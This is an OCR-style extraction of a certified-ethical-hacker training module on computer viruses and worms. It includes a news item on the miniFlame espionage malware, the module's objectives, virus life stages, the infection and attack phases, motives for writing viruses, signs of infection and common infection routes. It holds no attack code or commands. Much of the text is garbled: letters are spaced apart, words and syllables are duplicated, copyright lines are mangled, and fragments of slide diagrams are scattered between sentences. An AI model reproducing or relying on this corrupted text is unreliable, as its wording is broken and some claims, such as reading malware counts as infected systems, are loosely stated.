Viruses Viruses and Worms rms Module Modu le 07 07
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
V i r u s e s a n d W o r m s M o d u le 0 7
Engineered by Hackers. Presented by Professionals.
M
E th ic a l H a c k in g
a n d
C o u n t e rm e a s u re s v 8
M o d u l e 0 7 : V ir ir u s e s a n d W o r m s Exam 312-50
Mo dule 07 Page Page 1007
Ethical Hacking and Coun termea sures Copyright © by EC-C0li EC-C0linCil nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
CEH
Security Securi ty New s I GlobalRese arch
Home
Products
About
5«rv*cc 5«rv*ccss
Octo ber 19, 201 2
Global Cyber-Warfare Tactic s: New Flame-linked M a l w a r e u s e d i n “ C y b e r - Es Es p i o n a g e ” A new cyb er espionage program linked to the noto rious Flame and Gauss m alware has been detecte d by Russia' Russia'ss Kaspersky Kaspersky Lab. Lab. The anti-virus giant's chief warns that global cyber w arfare is in "full s wing " and w ill probably escalate in 2013. 2013. The virus, dubbed m iniFlame, and also know n as SPE, SPE, has has already infec ted com puters in Iran, Lebanon, France, France, the U nited States and Lithuania. It was discovered in July July 2012 and is described described as "a s mall and highly flexible malicious malicious program designed Kaspersky Lab said said in a statem ent po sted to steal data and control infecte d systems systems during target ed cyber espionage espionage operations," Kaspersky o n i t s w e b s i te te . The malw are was originally identified as an appendage of Flame - the program used for targeted cyber espionage in the the M iddle East and acknow ledged to be part o f join t US -lsraeli -lsraeli effor ts to underm ine Iran's nuclear program. But later, Kaspersky Kaspersky Lab analysts discovered tha t miniFlam e is an "interoperable tool that could be used as an independent malicious malicious program , o r concurrently as as a plug-in fo r both th e Flame and Gauss Gauss malw are." ^ ^ ^ ^ T h e a n a l y s i s a l so so s ho ho w e d n e w e vi vi de de nc nc e o f c o o p e ra ra t io io n b et et w e e n t h e c r ea ea t o orr s o f F la la me me a n d G a u s s ^ ^ ^ ^ ^ —
ht tp ://w ww. globa/rese globa/research, arch, ca ca Copyright © by EC-C EC-Cauactl. auactl. All Rights Reserved. Reserved. Reproduction is Strictly Prohibit ed.
S e c u r i ty ty N e w s an
M
M
G l o b a l C y b e r - W a r f a r e T a c t ic s : N e w
F la m e - lin k e d
M a lw a r e u s e d in “ C y b e r-E s p io n a g e ” Source: h t t p : / / w w w . g l o b a l r e s e a r c h . c a A new cyber espionage program linked to the notorious Flame and Gauss malware has been d e t e c t e d b y R u s si si a' a' s K a s p er er s k y L ab ab . T he he a n t i v i r u s g i a n t ' s c h i e f w a r n s t h a t g l o b a l c y b e r w a r f a r e is in "full swing" and probably escalate in 2013. The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website. The malware was originally identified as an appendage of Flame, the program used for t a r g e t e d c y b e r e s p i o n a g e i n t h e M i d d l e E as as t a n d a c k n o w l e d g e d t o b e p a r t o f j o i n t U S - l sr sr a el el i e f f o r t s t o u n d e r m i n e I r a n' n' s n u c l e a r p r o g r a m .
Module 07 Page 1008
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
B u t l a te te r , K a s p e rs r s k y La La b a n a l ys ys t s d i s c o v e r e d t h a t m i n i F l a m e is a n " i n t e r o p e r a b l e t o o l t h a t c o u l d be used as an independent malicious program, or concurrently as a plug-in for both the Flame a n d G au au s s m a l w a r e . " The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations. " M i n i F l a m e ' s a b i l i t y t o b e u s e d as as a p l u g - in in b y e i t h e r F l a m e o r G a us us s c l e a r l y c o n n e c t s t h e c o l l a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F l a m e a nd n d G au au ss ss . S in in c e t h e c o n n e c t i o n between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said. H ig h -p r e c is io n
a t ta c k t o o l
S o f a r j u s t 5 0 t o 6 0 c as a s es es o f i n f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d i n g t o K a s p e r s ky ky L ab ab . B u t u n l i k e F l a m e a n d G a us us s , m i n i F l a m e i n m e a n t f o r i n s t a l l a t i o n o n m a c h i n e s a l r e a d y i n f e c t e d b y t h o s e v i r u s es es . " M i n i F l a m e is a h ig i g h - p r e c i s i o n a t t a c k t o o l . M o s t l i ke ke l y i t is is a t a r g e t e d c y b e r w e a p o n u s e ed d in w h a t c a n b e d e f i n e d a s t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p er e r s k y' y' s C h i e f S e c u r i ty ty E x p e r t A l e x a n d e r G o s t e v e x p l a in in e d . " F i r s t , F l a m e o r G au au s s a r e u s e d t o i n f e c t a s m a n y v i c t i m s a s p o s s i b l e t o c o l l e c t l a r g e q u a n t i t i e s of information. After data is collected and reviewed, a potentially interesting victim is defined a n d i d e n t i f i e d , a n d m i n i F l a m e i s i n s t a llll e d i n o r d e r t o c o n d u c t m o r e i n - d e p t h s u r v e i l l a n c e a n d cyber-espionage." T h e n e w l y - d i s c o v e r e d m a l w a r e c a n a ls ls o t a k e s c r e e n s h o t s o f an an i n f e c t e d c o m p u t e r w h i l e i t is is running a specific program or application in such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client. Kaspersky Lab believes miniFlame's developers have probably created dozens of different m o d i f ic ic a t i o n s o f t h e p r o g r a m . " A t t h is i s t i m e , w e h a vve e o n l y f o u n d s ix ix o f th th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , " t h e f i r m s ai a i d. d. ‘ C y b e r w a r f a r e i n f u ll s w i n g ’ Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports. S p e a k in in g a t a n I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n i o n T e l e c o m W o r l d c o n f e r e n c e i n D ub ub a i, i, t h e a n t i v i r u s t y c o o n s a id id , " c y b e r w a r f a r e is i n f u l l s w i n g a n d w e e x p e c t i t t o e s c a l a t e i n 2 0 1 3 . " "The latest malicious virus attack on the world's largest oil and gas company, Sau di Aramco, last August shows how dependent we are today on the Internet and information technology in g e n e r a l , a n d h o w v u l n e r a b l e w e a r e , " K a s p er e r s ky k y s ai ai d. d. He stopped short of blaming any particular player behind the massive cyber-attacks across the M i d d l e E as as t, t, p o i n t i n g o u t t h a t " o u r j o b i s n o t t o i d e n t i t y h a c k e r s o r c y b e r - t e r r o r i s t s . O u r f i r m is
Module 07 Page 1009
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
like an X-ray machine, meaning we can scan and identify a problem, but we cannot say who or what is behind it." Iran, who confirmed that it suffered an attack by Flame malware that caused severe data loss, b l a m e s t h e U n i t e d S t a t e s a n d I s ra ra el el f o r u n l e a s h i n g t h e c y b e r - a t t a c k s .
C o p y r i g h t © 2 0 0 5 - 2 0 1 2 G l o b a lR lR e s e a r c h . c a B y R u s s ia ia T o d a y
http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867
Module 07 Page 1010
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
CEH
M odule odul e Ob j ectives J
Introducti on to Viruses
J
Comp uter Wo rms
J
Stages of Virus Life
J
Wo rm Analys is
J
Work ing of Viruses
J
Wo rm Maker
J
Indications of Virus Attack
J
Ma lwa re Analysis Pro cedure
J
How do es a Co mp uter Get Infected by Viruses
J
Online Ma lwa re Analysis Services
y
Virus Virus Analysis Analysis
J
Virus and Wo rm s Coun terme asures
J
Types of Viruses
J
Antivirus Tools
J
Virus M aker
J
Penet ration Testing for Virus
Copyright Copyright © by
Reproduction is Strictly Prohibit ed. EC-Cauactl.All Rights Reserved. Reproduction
M o d u l e O b j e c ti ti v e s T h e o b j e c t i v e o f th th i s m o d u l e i s t o e x p o s e y o u t o t h e v a r i o u s v ir ir u s e s a n d w o r m s a v a i l ab a b l e t o d a y . I t g i ve ve s y o u i n f o r m a t i o n a b o u t a llll th th e a v a i l a b l e v i r u se s e s a n d w o r m s . T h is is m o d u l e e x a m i n e s t h e w o r k i n g s o f a c o m p u t e r v i ru ru s , i ts ts f u n c t i o n , c l a s s i f ic ic a t i o n , an an d t h e m a n n e r i n w h i c h it affects systems. This module will go into detail about the various countermeasures available t o p r o t e c t a g a i n s t t h e s e v i r u s i n f e c ti t i o n s . T h e m a i n o b j e c t i v e o f t h is is m o d u l e i s t o e d u c a t e y o u a b o u t t h e a v a i l ab a b l e v i ru r u s e s a nd n d w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k an an d t h e w a y s t o p r o t e c t against various viruses, and testing your system or network against viruses or worms presence. This module will familiarize you with: 0
I n t r o d u c t i o n t o V i ru ru s e s
0
Computer Worms
0
Stages of Virus Life Life
0
W o r m A n al al y si si s
0
W o r k i n g o f V ir i r u se se s
0
W o r m M a k er er
0
I n d i c a t i o n s o f V i r us us A t t a c k
0
M a l w a r e A n a ly ly s i s P r o c e d u r e
0
How
0
O n l i n e M a l w a r e A n a l y s i s S e r vi vi c es es
0
V i ru r u s a nd nd W o r m s
Does
a
Co mp uter
Viruses? 0
Virus Analysis
0
Types of Viruses
Modut odute0 e07 7
!M a k e r
Get
Infected
by
Countermeasures 0
A n t i v i r u s T o o ls ls
E th ic a l H ac a c ki k if ^ a n P ^ f i t F i S t i a n e T e ^ Q g t f e f y V i F W f i llll C i l All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Module Flow Flow
Virus and Worms Concepts
Ty p e s o f Viruses
Penetration Testing
Computer Worms
Countermeasures
Malware Analysis
Copyright Copyright © by
Reproduction is Strictly Prohibit ed. E&Ctlllcil.All Rights Reserved. Reproduction
M o d u l e F lo lo w T h is is s e c t i o n i n t r o d u c e s y o u t o v a r i o u s v ir ir u s e s a nd n d w o r m s a v a i l a b le l e t o d a y a n d g i v es es y o u a b r i e f o v e r v i e w o f e a c h v i ru ru s a n d s t a t i s t i c s o f v ir ir u s e s a n d w o r m s i n t h e r e c e n t y e a r s. s . I t l is i s ts ts v a r i o u s t y p e s o f v i r u s es e s a n d t h e i r e f f e c t s o n y o u r s y s t e m . T h e w o r k i n g o f v i ru ru s e s i n e a c h p h a s e has will be discussed in detail. The techniques used by the attacker to distribute malware on the web are highlighted.
Malware Analysis
V i ru r u s a n d W o r m s C o n c ep ep t
, •
Types of Viruses
/—
Compute Computerr Worms
V
f|j||
Countermeasures
^
Penetration Testing Testing
—
Module 07 Page 1012
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Introducti Introduction on to V iru se s
C EH
_l A virus is is a self-replicating program tha t produces its own c opy by attaching itself to another program, program, computer boot sector or document J
Viruses a re generally trans mitted through file d ownl oads , infected disk/flash drives and as email attach ments
Virus Characteristics
Infects Other Program
Alters Data
Corrupts Files and Programs
Transforms Itself
m
F*
Encrypts Itself
m
Copyright Copyright © by
Self Propagates
V %
% # 1 f §
1
Reproduction is Strictly Prohibit ed. EC-Cauactl.All Rights Reserved. Reproduction
I n t r o d u c t i o n t o V i ru ru s e s C o m p u t e r v ir ir u s e s h a v e t h e p o t e n t i a l t o w r e a k h a v o c o n b o t h b u s i n es es s an an d p e r s o n a l c o m p u t e r s . W o r l d w i d e , m o s t b u s in i n e s se se s h a v e b e e n i n f e c t e d a t s o m e p o i n t . A v i r u s is is a s e lf lf replicating program that produces its own code by attaching copies of it into other executable c o d e s . T h i s v i r u s o p e r a t e s w i t h o u t t h e k n o w l e d g e o r d e s i r e o f t h e u s e r . L i ke ke a r e a l v i r u s , a c o m p u t e r v i ru r u s is is c o n t a g i o u s a n d c an a n c o n t a m i n a t e o t h e r f i le le s . H o w e v e r , v ir ir u s e s c a n i n f e c t outside machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical c i r c u m s t a n c e i s m e t . T h e r e a r e t h r e e c a t e g o r i e s o f m a l i c io io u s p r o g r a m s : 0
Trojans and rootkits
0
Viruses
0
Worms
A w o r m i s a m a l i c i o u s p r o g r a m t h a t c a n in in f e c t b o t h l oc oc a l a n d r e m o t e m a c h i n e s . W o r m s s p r e a d a u t o m a t i c a l l y b y i n f e c t i n g s y s te te m a f t e r s y s t e m in in a n e t w o r k , a n d e v e n s p r e a d i n g f u r t h e r t o other networks. Therefore, worms have a greater potential for causing damage because they do not rely on the user's actions for execution. There are also malicious programs in the wild t h a t c o n t a i n a llll o f t h e f e a t u r e s o f t h e s e t h r e e m a l ic i c i o u s p r o g ra ra m s .
Module 07 Page 1013
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Viru Vi russ and Worm Statist Sta tistics ics
75,000,000
60,000,000
45,000,000
30,000,000
15,000,000
2008
2010
2011
2012 http://www. http://www.av-test.org
Copyright Copyright © by
Reserved. Reproduction Reproduction is Strictl y Prohibited. E&Ctinctl.All Rights Reserved.
^ V i r u s a n d W o r m S t a ti t i s ti ti c s Source: h t t p : / / w w w . a v - t e s t . o r g T h is is g ra ra p h i c a l r e p r e s e n t a t i o n g i v e s d e t a i l e d i n f o r m a t i o n o f t h e a t t a c k s t h a t h a v e o c c u r r e d i n t h e r e c e n t y e a rs rs . A c c o r d i n g t o t h e g r a p h , o n l y 1 1 ,,6 6 6 6 , 6 6 7 s y s t e m s w e r e a f f e c t e d b y v ir ir u s e s a nd nd worms in the year 2008, whereas in the year 2012, the count drastically increased to 70,000,000 systems, which means that the growth of malware attacks on systems is increasing expo nentially year by year.
Module 07 Page 1014
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
75.000.000
60.000.000
45.000.000
30.000.000
15.000.000
0 2008
2009
2010
2011
2012
FIGURE 7.1: 7.1: Virus and and Wo rm Statistics
Mo dule 07 Page Page 1015
Ethical Hacking and Coun termea sures Copyright © by EC-C EC-COU OUIlC IlCilil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Design Developing virus
Replication Virus replicates for
Launch It gets activated with the user performing
code using
a period period of time
programming
within the target
languages or
system and then
certain actions such as running an
construction kits
spreads itself
infected program
Incorporation
Detection
Users install
Elimination
A n t i v ir ir u s s o f t w a r e
A virus is identified
antivirus updates and eliminate the
developers
as threat infecting
assimilate defenses
target systems
virus threats
against the virus
S t a g e s o f V i r u s L i fe fe C o m p u t e r v i r u s a tt t t a c k s s p re re a d t h r o u g h v a r i o u s s ta t a g es es f r o m i n c e p t i o n t o d e s i g n t o elimination.
1.
Design: A v ir ir u s c o d e i s d e v e l o p e d b y u s in in g p r o g r a m m i n g l a n g u a g es e s o r c o n s t r u c t i o n k it i t s. s. A n y o n e w i t h b as as ic ic p r o g r a m m i n g k n o w l e d g e c an a n c r e a te t e a v ir i r us us .
2.
Replication: A v ir ir u s f i r s t r e p l ic ic a t e s i t s e l f w i t h i n a t a r g e t s y s t e m o v e r a p e r i o d o f t i m e .
3.
Launch: It is activated when a user performs certain actions such as triggering or running an infected program.
4.
Detection: A virus is identified as a threat infecting target systems. Its actions cause considerable d a m a g e t o t h e t a r g e t s y s t e m ' s d at at a .
Module 07 Page 1016
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
5.
Exam 312-50 Certified Ethical Hacker
Incorporation: Antivirus software developers assemble defenses against the virus.
6.
Elimination: Users are advised to install antivirus software updates, thus creating awareness among user groups
Module 07 Page 1017
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Working of Viru Viruses ses: : Infe Infect ctio ion n Phase Infection Phase
J
In the infection phase, the virus repl icates itself and attaches to an .exe file in the system
Before Infection
After Infection
* Clean File
Virus Infected File
Copyright Copyright © by
Reproduction is Strictly Prohibit ed. EG-G0llicil.All Rights Reserved. Reproduction
W o r k i n g o f V i ru ru s e s : I n f e c t i o n P h a s e Viruses
attack
a
target
host's
system
by
using
various
methods.
They
attach
t h e m s e l v e s t o p r o g r a m s a n d t r a n s m i t t h e m s e l v e s t o o t h e r p r o g r a m s b y m a k i n g u s e o f c e r ta ta i n events. Viruses need such events to take place since they cannot: ©
Self sta rt
©
Infect othe r hardware
©
C a us us e p h y s i c a l d a m a g e t o a c o m p u t e r
©
T r a n s m i t t h e m s e l v e s u s in i n g n o n - e x e c u t a b l e f ilil e s
G e n e r a l l y v i r us u s e s h a v e t w o p h as a s e s, s, t h e i n f e c t i o n p h a s e a n d t h e a t t a c k p h a s e . I n t h e i n f e c t i o n p h as as e , t h e v i r u s r e p l i c a t e s i t s e l f a n d a t t a c h e s t o a n . e x e f ilil e i n t h e s y s t e m . Programs modified by a virus infection can enable virus functionalities to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads t o t h e v i r u s c o d e. e. V i r u s w r i t e r s h a v e t o m a i n t a i n a b a l a n c e a m o n g f a c t o r s s u c h as as : ©
H o w w i l l t h e v i r u s i n f e c t? t?
©
How will it spread?
©
H o w w i llll it it r e si si d de e in in a t a r g e t c o m p u t e r ' s m e m o r y w i t h o u t b ei ei n ng g detected?
Mo dule 07 Page Page 1018
Ethical Hacking and Coun termea sures Copyright © by EC-C0 EC-C0Un UnCi Cill All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
O b v i o u s l y , v i r us us e s h a v e t o b e t r i g g e r e d a n d e x e c u t e d i n o r d e r t o f u n c t i o n . T h e r e a r e m a n y w a y s to execute programs while a computer is running. For example, any setup program calls for n u m e r o u s p r o g r a m s t h a t m a y b e b u i l t i n t o a s y s te t e m , a n d s o m e o f t h e s e a re re d i s t r i b u t i o n m e d i u m p r o g r a m s . T h u s , i f a v i r u s p r o g r a m a l r e a d y e xi x i s ts ts , i t ca ca n b e a c t i v a t e d w i t h t h i s k i n d o f execution and infect the additional setup program as well. There are virus programs tha t infect and keep spreading every tim e they are executed.
Some
p r o g r a m s d o n o t i n f e c t t h e p r o g r a m s w h e n f i r s t e x e c u t e d . T h e y r e si s i d e in in a c o m p u t e r ' s m e m o r y and infect programs at a later time. Such virus programs as TSR wait for a specified trigger event to spread at a later stage. It is, therefore, difficult to recognize which event might trigger t h e e x e c u t io i o n o f a d o r m a n t v i r u s i n f e c ti ti o n . R e f e r t o t h e f i g u r e t h a t f o l l o w s t o s ee ee h o w t h e EXE f i le le i n f e c t i o n w o r k s . In the following figure, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code too, along with the application program as soon as it is run. Q
A f i l e v i r u s in in f e c t s b y a t t a c h i n g i t s e l f t o a n e x e c u t a b l e s y s t e m a p p l i c a t i o n p r o g r a m . T e x t files such as source code, batch files, script files, etc., are considered potential targets for virus infections.
©
B o o t s e c t o r v i ru ru s e s e x e c u t e t h e i r o w n c o d e i n t h e f i r s t p l a c e b e f o r e t h e t a r g e t PC PC is booted
Before Infection
After Infection
.exe
N
_ u
Clean File
Virus Infected File
FIGURE 7.2: Working of Viruses in Infection Phase
Module 07 Page 1019
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Working of Viru Viruse ses: s: Attack
r cu V t
D U o q p ^ ^
11
Ur t fW< ttkxjl NmIm
J
Viruses a re progr ammed with trigger ev ents to activ ate and c orrupt systems
J
Some viruses infect each tim e t hey a re run and o thers infect only w hen a cer tain predefined condition is met such as a user's specific task, a day, time, or a particular event
Unf ragmented File Before Att Att ack File: A
Page: 1
1
Page:2
J _____________ 1 Page:3
A
A
11
File: B
1
P age:2
Page: 1
P age :3
File Fragmented Due to Virus Att ack Page: 1 File: A
P age:3 File: B
P a g e :3 File: A
Page: 1 File: B
Copyright Copyright © by
P age:2 File: B
P a g e :2 File: A
Reproduction is Strictly Prohibit ed. E&Cauactl. All Rights Reserved. Reproduction
W o r k i n g o f V i ru ru s e s : A t t a c k P h a s e Once viruses spread themselves throughout the target system, they start corrupting t h e f i l e s a n d p r o g r a m s o f t h e h o s t s y s t e m . S o m e v i ru ru s e s h a v e t r i g g e r e v e n t s t h a t n e e d t o b e activated to corrupt the host system. Some viruses have bugs that replicate themselves, and p e r f o r m a c t i v i t ie ie s s u c h as as d e l e t i n g f i l e s a n d i n c r e a s i n g s e s s io io n t i m e . They corrupt their targets only after spreading as intended by their developers. Most viruses t h a t a t t a c k t a r g e t s y s t e m s p e r f o r m a c t i o n s su s u c h as as : Q
D e l e t i n g f i le le s a nd nd a l t e r i n g c o n t e n t i n d a t a fifi le le s , t h e r e b y c a u s in in g t h e s y s t e m t o s l o w down
e
Perform ing
ta ta s k s
not
related
to
applications,
s uc uc h
as as
p l a y in in g
music
and
c r e a t in in g
animations
Module 07 Page 1020
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
U n f r a g m e n t e d F il e B e f o r e A t t a c k
File: A
Page: 1
Page: 2
File: B
Page: 3
Page: 1
Page: 2
Page: 3
A
F i le l e F r a g m e n t e d D u e t o V ir ir u s A t t a c k
Page: 1 File: A
Page: 3 File: B
Page: 1 File: B
Page: 3 File: A
Page: 2 File: B
A
Page: 2 File: A A
FIGURE 7.3: Working of Viruses in Attack Phase
R e f e r t o t h i s f i g u r e , w h i c h h as as t w o f i l e s , A a n d B. B. In In s e c t i o n o n e , t h e t w o f i l e s a r e l o c a t e d o n e after the other in an orderly fashion. Once a virus code infects the file, it alters the positioning o f t h e f i le le s t h a t w e r e c o n s e c u t i v e l y p l a ce c e d , t h u s l e a d i n g t o i n a c c u r a c y i n f i le le a l l o c a t i o ns ns , c a u s i n g t h e s y s t e m t o s l o w d o w n a s u se s e rs rs t r y t o r e t r i e v e t h e i r fi fi l es es . I n t h i s p h a s e: e: ©
V i ru ru s e s e x e c u t e w h e n s o m e e v e n t s a r e t r i g g e r e d
0
S o m e e x e c u t e an a n d c o r r u p t v ia ia b u i l t - in in b u g p r o g r a m s a f t e r b e i n g s t o r e d i n t h e h o s t ' s memory
0
M o s t vi vi r u s e s a r e w r i t t e n t o c o n c e a l t h e i r p r e s e nc nc e , a t t a c k i n g o n l y a f t e r s p r e a d i n g i n t h e host to the fullest extent
Module 07 Page 1021
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W h y Do D o Peopl eople e Create Compu Co mpute ter r Viruses
r cu |
UrtifWd
ttkiul Km Im
Comp Co mput uter er Viruses Inflict damage to competitors
J J J
Financial benefits Research projects
Play prank
Vandalism
Cyber terrorism Distribute political messages
Vulnerable System
Copyright Copyright © by
Reproduction is Strictly Prohibit ed. E&Cauactl. All Rights Reserved. Reproduction
W h y D o P e o p l e C r e a t e C o m p u t e r V i ru ru s e s ? Source: h t t p : / / w w w . s e c u r i t y d o c s . c o m C o m p u t e r v i r us u s e s ar ar e n o t s e lf lf - g e n e r a t e d , b u t a r e c r e a t e d b y c y b e r - c r i m i n a l m i n d s , i n t e n t i o n a l l y designed to cause destructive occurrences in a system. Generally, viruses are created with a disreputable motive. Cyber-criminals create viruses to destroy a company's data, as an act of v a n d a l i s m o r a p r a n k , o r t o d e s t r o y a c o m p a n y ' s p r o d u c t s . H o w e v e r , i n s o m e c as a s es es , v i r u se se s a r e actually intended to be good for a system. These are designed to improve a system's performance by deleting previously embedded viruses from files. S o m e r e a s o n s v i r u se se s h a v e b e e n w r i t t e n i n c l u d e : e
I n f lili c t d a m a ge ge t o c o m p e t i t o r s
e
R e s e a rc rc h p r o j e c t s
0
Pranks
Q
Vandalism
e
Attack the products of specific companies
©
Distribute political messages
0
Financial gain
Module 07 Page 1022
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Q
Iden tity the ft
Q
Spyware
Q
Cryptoviral exto rtion
Module 07 Page 1023
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
Processes take take mo re resources and time
C o m p u t e r s l ow ow s down when programs start
Computer freezes frequently or encounters error
I n d i c a t i o n s o f V i ru r u s A t ta ta c k s An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the m a c h i n e s o f t h e u s e r s w h o r e c e i ve v e t h e m . A v i r u s ca c a n a ls ls o m a k e g o o d u se se o f f i le le s e r v e rs rs i n o r d e r t o i n f e c t f ilil e s . T h e f o l l o w i n g a r e i n d i c a t io io n s o f a v i r u s a t t a c k o n a c o m p u t e r s y s t e m : Q
P r o g r a m s t a k e l o n g e r t o lo lo a d
Q
The hard drive is always full, even wit ho ut installing any programs
Q
T h e f l o p p y d i s k d r i v e o r h a r d d r i v e r u n s w h e n i t is is n o t b e i n g us us e d
9
U n k n o w n f i le le s k e e p a p p e a r i n g o n t h e s y s t e m
0
T h e ke k e y b o a r d o r t h e c o m p u t e r e m i t s s t ra r a n g e o r b e e pi p i n g s o u nd nd s
Q
T h e c o m p u t e r m o n i t o r d i sp s p l a ys ys s t r a n g e g r a p h i c s
Q
F ilil e n a m e s t u r n s t r a ng ng e , o f t e n b e y o n d r e c o g n i t i o n
Q
T h e h a r d d r i v e b e c o m e s i n a c c e s s i b le le w h e n t r y i n g t o b o o t f r o m t h e f l o p p y d r i v e
©
A p r o g r a m ' s s iz iz e k e e p s c h a n g i n g
Q
T h e m e m o r y o n t h e s y s te t e m s e e m s t o b e in in us us e a n d t h e s y s t e m s l o w s d o w n
Module 07 Page 1024
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
H o w does a Compute Comp uter r Get Get Infe Infect cted ed by Viruses Whe n a user accepts accepts file files s and dow nloads w ithout checking checking properlyforthe source
ing infected e-mail attachm ents
Installing Installing pirated pirated so ftwa re
Not upda tingand not installing installing new versions of plug-i plug-ins ns
: running the latest anti-virus anti-virus application
Copyright © by EC-C EC-Cauactl. auactl. All Rights Reserved. Reserved. Reproduction is Strictly Prohibited.
H ow D o e s a C o m p u t e r G e t I n fe c t e d b y V i ru s e s ? T h e r e a r e m a n y w a y s i n w h i c h a c o m p u t e r g e t s in in f e c t e d b y v i ru ru s e s . T h e m o s t p o p u l a r m e t h o d s a r e as as f o l l o w s : ©
W h e n a u s e r a c c e p t s f i le le s a n d d o w n l o a d s w i t h o u t c h e c ki k i n g p r o p e r l y f o r t h e s o ur ur c e .
©
A t t a c k e r s u s u a l l y s e n d v i r u s - i n f e c t e d f i le le s as as e m a i l a t t a c h m e n t s t o s p r e a d t h e v i r u s o n t h e v i c t i m ' s s y s t e m . I f t h e v i c t i m o p e n s t h e m a i l , th th e v i r u s a u t o m a t i c a l l y i n f e c t s t h e system.
©
A t t a c k e r s i n c o r p o r a t e v ir ir u s e s i n p o p u l a r s o f t w a r e p r o g r a m s a n d u p l o a d t h e i n f e c t e d software on websites intended to download software. When the victim downloads i n f e c t e d s o f t w a r e a n d i n s t a llll s it i t , th th e s y s t e m g e t s i n f e c t e d .
©
F a ilil in i n g t o i n s t al al l n e w v e r s io io n s o r u p d a t e w i t h l a t e s t p a t c h e s i n t e n d e d t o f ix ix t h e k n o w n b u g s m a y e x p o s e y o u r s y s t e m t o v i r us us e s .
©
W i t h t h e i n c r e a s i n g t e c h n o l o g y , a t t a c k e r s a l so so a r e d e s i g n i n g n e w v i r u s e s . F ai ai l in in g t o u s e latest antiv irus applications may expose you to virus attacks
Module 07 Page 1025
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
